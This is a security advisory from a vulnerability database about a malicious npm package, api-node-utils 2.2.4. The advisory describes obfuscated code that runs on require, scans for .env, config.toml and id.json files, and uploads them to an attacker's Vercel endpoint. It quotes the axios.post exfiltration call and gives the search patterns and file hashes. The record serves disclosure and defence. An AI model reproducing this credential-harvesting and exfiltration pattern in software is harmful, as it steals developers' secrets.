VDB
GCVE-110-OSM-2026-3168
GCVE-110-OSM-2026-3168
Advisory PublishedCVSS 8.8/10
Exfiltrates credential and configuration files (.env, config.toml, id.json) from victim machines to an attacker-controlled Vercel endpoint at polymarkettrading.vercel.app, prepending the victim username and local IP address to each stolen file.
Both index.js and test.js are obfuscated with J2TEAM.org (obfuscator-io-rotation-fragcode). At require-time, test.js calls main() which invokes from_str() in index.js: recursively scans process.cwd() for files matching id.json, config.toml, Config.toml, .env, env, and *.env patterns; collects victim username (process.env.USER) and local IP (UDP dgram socket connected to 8.8.8.8:80); prepends '{USER}@{localIP}\n' before each file's content; and exfiltrates each file via axios.post('https://polymarkettrading.vercel.app/api/v1', data, {headers: {'Content-Type': 'application/octet-stream'}}) with 100ms delay between uploads. Exported function names (verify_hash, search_hashes, from_str) are deliberate cover for file-search and upload behavior. sha256(index.js): 699ea52a98aa289f33baae9994d0c8f89858e42a5bf3f3c9a443b88e7778c5c7. sha256(test.js): b1529ce419b75187fe37fb1baebfcaeb95a57414481dbb505c2f1773e04a2467.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | api-node-utils | 2.2.4 (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.